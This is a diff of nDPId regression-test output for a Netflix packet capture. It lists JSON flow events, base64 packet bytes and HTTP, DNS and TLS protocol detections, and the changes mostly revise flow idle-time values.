-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1484319049516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049516,"pkt":"gCqoTGHM5JjWH70UCABFAAA0TN5AAEAG0FLAqAEHNFkni8+gAFCVL\/Ajgv2MUYAQEBVJOgAAAQEICh9k91KtiNcH"} -00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048780,"flow_last_seen":1484319048780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319048780,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1484319048780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319048780,"pkt":"gCqoTGHM5JjWH70UCABFAABAtrNAAEAGzAfAqAEHNsm\/hM+fAFA6e8d6AAAAALAC\/\/+ZMQAAAgQFtAEDAwUBAQgKH2T0hAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1484319048824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319048824,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGmJ82yb+EwKgBBwBQz59tgW\/FOnvHe6ASRep1DwAAAgQFtAQCCApXXrqDH2T0hAEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1484319048826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319048826,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VQxAAEAGLbvAqAEHNsm\/hM+fAFA6e8d7bYFvxoAQEBXZhAAAAQEICh9k9LFXXrqD"} +00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049465,"flow_last_seen":1484319049465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049465,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1484319049465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049465,"pkt":"gCqoTGHM5JjWH70UCABFAABAjtZAAEAGjk7AqAEHNFkni8+gAFCVL\/AiAAAAALAC\/\/+toQAAAgQFtAEDAwUBAQgKH2T3IAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1484319049510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049510,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwBQz6CC\/YxQlS\/wI6ASRerkyQAAAgQFtAQCCAqtiNcHH2T3IAEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1484319049516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049516,"pkt":"gCqoTGHM5JjWH70UCABFAAA0TN5AAEAG0FLAqAEHNFkni8+gAFCVL\/Ajgv2MUYAQEBVJOgAAAQEICh9k91KtiNcH"} +00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1484319049641,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319049641,"pkt":"gCqoTGHM5JjWH70UCABFAABCJHQAAP8RE97AqAEHwKgBAcoQADUALkrZBBoBAAABAAAAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAE="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -152,137 +152,137 @@ 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1484319049665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1484319049665,"pkt":"5JjWH70UgCqoTGHMCABFAABi4UdAAEAR1erAqAEBwKgBBwA1yhAATkFkBBqBgAABAAIAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAHADAABAAEAAAAMAAS4GcwYwAwAAQABAAAADAAEuBnMKA=="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049672,"flow_last_seen":1484319049672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049672,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1484319049672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049672,"pkt":"gCqoTGHM5JjWH70UCABFAABAS8NAAEAGqRPAqAEHuBnMGM+hAFBgKjK0AAAAALAC\/\/92\/gAAAgQFtAEDAwUBAQgKH2T36AAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049672,"flow_last_seen":1484319049672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049672,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1484319049672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049672,"pkt":"gCqoTGHM5JjWH70UCABFAABAS8NAAEAGqRPAqAEHuBnMGM+hAFBgKjK0AAAAALAC\/\/92\/gAAAgQFtAEDAwUBAQgKH2T36AAAAAAEAgAA"} 00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1484319049681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1484319049681,"pkt":"5JjWH70UgCqoTGHMCABFAAFl4UhAAEAR1ObAqAEBwKgBBwA1zHsBUaLnX+eBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAHADAAFAAEAAABiAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFYABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANChyo8BNABwAAQAAABcAECYgAQhwDwAAAAAAADQoMS\/ATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KQT4wE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCk7ncBNABwAAQAAABcAECYgAQhwDwAAAAAAADQnRIjATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KBwAwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCh7ccBNABwAAQAAABcAECYgAQhwDwAAAAAAADQoNhw="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049684,"flow_last_seen":1484319049684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049684,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1484319049684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049684,"pkt":"gCqoTGHM5JjWH70UCABFAABAHF1AAEAGFLrAqAEHNr8RM8+qAbupwyRaAAAAALAC\/\/92fwAAAgQFtAEDAwUBAQgKH2T39AAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1484319049697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049697,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lq4GcwYwKgBBwBQz6GV0BcIYCoytaAScSDlwwAAAgQFtAQCCAr\/\/IQ4H2T36AEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1484319049700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049700,"pkt":"gCqoTGHM5JjWH70UCABFAAA0bmdAAEAGhnvAqAEHuBnMGM+hAFBgKjK1ldAXCYAQEBV1gAAAAQEICh9k+AH\/\/IQ4"} -00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1484319049740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049740,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z6pwpjzKqcMkW6ASOJCp2gAAAgQFtAQCCAqtikoKH2T39AEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1484319049743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049743,"pkt":"gCqoTGHM5JjWH70UCABFAAA0ddRAAEAGu07AqAEHNr8RM8+qAbupwyRbcKY8y4AQEBUA7QAAAQEICh9k+CqtikoK"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319050652,"flow_last_seen":1484319050652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319050652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1484319050652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319050652,"pkt":"gCqoTGHM5JjWH70UCABFAABA2xBAAEAGenHAqAEHF\/YLkc+rAFC8XkCtAAAAALAC\/\/9pzAAAAgQFtAEDAwUBAQgKH2T7jgAAAAAEAgAA"} 